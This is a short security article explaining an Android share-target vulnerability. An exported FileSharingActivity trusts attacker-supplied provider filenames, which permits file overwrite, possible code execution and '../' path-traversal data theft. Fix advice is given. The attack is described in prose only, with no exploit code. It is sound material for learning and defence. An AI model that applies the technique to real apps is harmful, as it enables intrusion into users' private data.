Exploiting Android FileSharingActivity: Overwrite Files and Trigger Code Execution

Vulnerability Overview

Android enforces application sandboxing through various protection mechanisms, assigning each app dedicated data and memory spaces. To facilitate data and file sharing, Android provides the Content Provider component, which can be misused, leading to sensitive information leakage, file overwriting, and even arbitrary code execution.

Vulnerability Model

The flaw exists in Android apps that accept data from other apps, especially file‑sharing intents (e.g., email, browser, SMS, social apps). The exported FileSharingActivity handles intents with actions android.intent.action.SEND or android.intent.action.SEND_MULTIPLE, accepting audio, image, video, etc.

After receiving external data, FileSharingActivity invokes handleIntent, which queries the incoming Uri via a Provider Resolver to obtain the filename and size, then calls copyFile.

The copyFile method receives two parameters: the first uri supplied by the third‑party app, and the second filename obtained from the previous step. Both parameters are attacker‑controlled, enabling crafted values to achieve exploitation.

Exploitation

The first attack vector overwrites victim app data by constructing a malicious Uri pointing to an attacker‑controlled Provider and a filename that matches a target file in the victim's private storage. The attacker’s Provider must implement query and openInputStream (or openFile) to return a ParcelFileDescriptor containing the attacker’s payload.

If the overwritten file is executable (e.g., APK, DEX, SO), arbitrary code execution may follow.

Another attack extracts sensitive data by directing copyFile to copy private files (e.g., databases) to a public SD‑card location, using a crafted Uri that points to the victim’s own Provider and a filename that includes path‑traversal sequences ("../") to reach the external storage.

Fix Recommendations

Do not rely on query results from a Provider to generate filenames; instead generate random names or sanitize inputs thoroughly.

Validate all external data: reject or canonicalize paths using File.getCanonicalPath() to remove "../" sequences, and ensure the resulting path resides within the app’s private directory.

References

https://developer.android.com/training/sharing/receive?hl=zh-cn

https://www.blackhat.com/asia-23/briefings/schedule/index.html#dirty-stream-attack-turning-android-share-targets-into-attack-vectors-30234

https://www.youtube.com/watch?v=oZTGR9vJVMQ